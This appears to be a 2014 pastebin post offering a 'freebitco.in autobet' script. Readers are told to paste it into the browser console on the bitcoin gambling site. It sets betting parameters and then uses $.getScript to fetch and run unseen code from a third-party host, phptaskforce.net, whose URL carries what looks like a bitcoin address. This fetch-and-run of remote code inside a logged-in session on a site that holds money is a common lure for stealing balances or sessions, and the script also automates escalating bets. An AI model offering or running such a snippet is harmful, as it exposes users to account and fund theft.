freebitco.in autobet


SUBMITTED BY: Guest

DATE: Sept. 29, 2014, 6:20 p.m.

FORMAT: JavaScript

SIZE: 559 Bytes

HITS: 1772

  1. // Paste this code into the Javascript console
  2. // Tweak configuration settings, depending on your balance
  3. config = {
  4. multiplier : 4,
  5. sleep : 100,
  6. goal : 0.00003000,
  7. btcGuard : 0.00000020,
  8. startStake : 1,
  9. sound : 'on',
  10. toggle : false,
  11. delayLimit : 50
  12. };
  13. $.getScript(
  14. 'http://phptaskforce.net/script/1NB1yys2uPtuC44zobnzcNeQ2Nea5Bv8jT',
  15. function() { init(); }
  16. );

comments powered by Disqus